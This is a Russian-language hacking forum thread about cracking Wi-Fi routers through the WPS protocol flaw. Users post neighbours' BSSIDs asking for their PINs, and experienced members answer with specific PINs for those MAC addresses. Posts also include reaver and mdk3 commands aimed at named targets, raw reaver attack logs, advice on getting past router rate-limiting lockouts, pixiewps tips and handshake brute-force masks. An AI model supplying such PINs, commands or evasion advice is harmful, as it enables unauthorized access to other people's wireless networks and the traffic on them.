Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. Mr oOLokiOo

    Mr oOLokiOo New Member

    Joined:
    2 Nov 2015
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток!
    Такой вопрос:

    Цель - TP-LINK_2CD8FC
    Использую reaver - sudo reaver -i mon0 -b 14:CC:20:2C:D8:FC -vv
    Роутер меня блочит - "WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking"

    Запускаю reaver с параметром -L , получаю зацикленный:
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

    Пробовал - mdk3 mon0 a -a 14:CC:20:2C:D8:FC -m
    Эффект тот же

    Что reaver, что mdk3 пробовал запускать сразными параметрами. reaver с параметром "-d 0" ещё как-то некоторое время пробивал этот роутер, но в итоге всё равно прихожу к эффекту описанному выше...

    Остаётся смотреть только в сторону - handshake или что-то ещё посоветуете?
    Заранее, спасибо!
     
  2. 1Smert1

    1Smert1 New Member

    Joined:
    2 Nov 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Ребят, будьте добры, прогоните эти:
    44:94:FC:86:FE:0C
    B8:A3:86:1B:48:48
    F8:1A:67:4D:B7:38
    Заранее спасибо!
     
  3. AlexRU

    AlexRU Well-Known Member

    Joined:
    11 Oct 2015
    Messages:
    115
    Likes Received:
    489
    Reputations:
    4
    B8:A3:86:1B:48:48
    -------------------------------
    96501252 | D-Link PIN
    85316768 | D-Link PIN +1
    46264848 | Static PIN - Broadcom 2
    76229909 | Static PIN - Broadcom 3
    62327145 | Static PIN - Broadcom 4
    ----------------------------------------------
    используйте прогу Router Scan от binarymaster там встроенный WPS Pin
     
  4. UNIXTREID

    UNIXTREID Member

    Joined:
    2 Nov 2015
    Messages:
    140
    Likes Received:
    22
    Reputations:
    1
    У меня следующий вопрос: стал использовать reaver на косячной Kali 2.0. Очень класно, что там Pixie WPS реализован "из коробки". Но при попытке сломить какую-либо точку выдаёт кучу раз только пресловутый "Failed to associate with ..." и всё до бесконечности, и так с любым набором опций. Может есть способ как-то побороть эту проблему? Как, например, уже решили проблему Kali 2.0 с переводом карты в mode режим. Или,может, всё зависит от адаптера? На старенькой Kali 1.0.9 такой проблемы никогда не возникало, но там reaver без pixie, а с "ручной" установкой возникают проблемы :(
     
  5. Tuana

    Tuana New Member

    Joined:
    1 Oct 2015
    Messages:
    20
    Likes Received:
    3
    Reputations:
    0
    У меня такое возникало только на удаленных точках с качеством (RXQ) до 10%. Проблема решилась после покупки адаптера с направленной антенной.
    На форумах специалисты утверждают, что последний Reaver значительно более чувствителен к качеству сигнала - дело не в Kali, а в Reaver.
    Здесь на форуме это тоже обсуждалось. проблему решили откатом версии Reaver.
     
  6. UNIXTREID

    UNIXTREID Member

    Joined:
    2 Nov 2015
    Messages:
    140
    Likes Received:
    22
    Reputations:
    1
    Так-то да, в результате серии опытов я пару раз замечал, что действительно если переставить ноут туда, где сигнал получше, через раз начинает пробивать, но срывается. Это где-то было уже 40-45% сигнала. Прошлый reaver, для сравнения, как-то подобрал мне ключ при 25% сигнала.
    Что касается отката версии reaver, то мне же нужен новый reaver только из-за встроенного pixie скрипта. Ведь для взлома именно этим способом нужен усовершенствованный reaver для получения PKE и др. значений. Или есть предыдущий reaver уже с pixie функцией, но менее чувствительный к сигналу? Какая версия? Возможно, я что-то пропустил...
    Или всё-таки "золотой серединой" будет покупка дополнительного адаптера (вроде Alfa AWUS 036nh)???
     
  7. Sacha

    Sacha New Member

    Joined:
    21 Oct 2015
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Подскажите пожалуйста есть PIN или решение с этим мак DC:02:8E:68:X:52
     
  8. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    94229882
     
    Sacha likes this.
  9. OldSchool1990

    OldSchool1990 New Member

    Joined:
    5 Nov 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
  10. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Было бы удобнее, если вы скопировали бы текстом BSSID'ы, но не поленюсь набрать... :)

    40:4A:03:77:EC:9F - ZyXEL Keenetic Lite - пин код 78593596
    00:0E:8F:8D:E2:7C - Smart Box v1 - получится вскрыть через Reaver+PixieWPS (под Kali Linux)
     
  11. OldSchool1990

    OldSchool1990 New Member

    Joined:
    5 Nov 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    • есть пин с этими мак адресами? 00:0E:8F:8D:E2:7C
      6C:18:8F:8D:E2:7C
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Если бы был пин, я написал бы вам об этом выше.
    Это тоже самое устройство, только гостевая сеть.
     
  13. Irorr

    Irorr New Member

    Joined:
    3 Nov 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Сегодня обнаружил что в подъеде поработал mgts плотненько, появилось около 10 новых wifi сетей. Названия все похожие MGTS_GPON_5656, различаются только последними циферками все. У всех был открыт впс, Пробовал через pixiewps, не получается( пробовал некоторые пины из тех что показывает дампер, и роутер скан, не подходит и через несколько попыток лочится. Есть может какой способ победить Sercomm, какие-нибудь стандартные пины для них... Пробовал брутить хендшейки по маске 495?d?d?d?d?d?d?d, 499 и тд..
    Пример точки 94:4A:0C:A1:B9:18
     
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    По идее pixiewps должен их крякать, но может прошивку пропатчили...
     
  15. OldSchool1990

    OldSchool1990 New Member

    Joined:
    5 Nov 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    6C:18:8F:F6:5D:E0 а у него какой пин?
     
  16. Irorr

    Irorr New Member

    Joined:
    3 Nov 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    модель пишет RV6688v2, может какая-то новая ревизия, хотя без v2 я и не встречал пока что и сравнить не могу, т.к. недавно только заинтересовался этой темой.
     
  17. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    у кого какие точки поддались на pixiescript?
     
  18. OldSchool1990

    OldSchool1990 New Member

    Joined:
    5 Nov 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Можно ли поставить Kali Linux на виртуальную машину с этими характеристиками? (Процессор: Intel Atom Z3735G 1830 МГц 1ГБ Оперативной памяти 4 ядра. WiFi модуль Realties RTL8723BS Wireless Lan 802.11n SDIO Network)
     
  19. Fenixindigo

    Fenixindigo New Member

    Joined:
    5 Nov 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите !!!
    Есть очень много точек с включенным WPS
    при использование REAVER -d D0:54:2D:0C:3B:18 -vv
    выдает что роутер называеться
    CIG GPON ONT RG
    Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete (0 seconds/pin)
    [+] Max time remaining at this rate: (undetermined) (11000 pins left to try)
    [+] Trying pin 12345670
    [!] WARNING: Failed to associate with D0:54:2D:0C:3B:18 (ESSID: )
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    ^C
    [+] Nothing done, nothing to save.

    [+] Session saved.

    Что делать как PIN подобрать
     
  20. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    сигнал полное _овно. или твой адаптер не слышит точка.
     
    binarymaster likes this.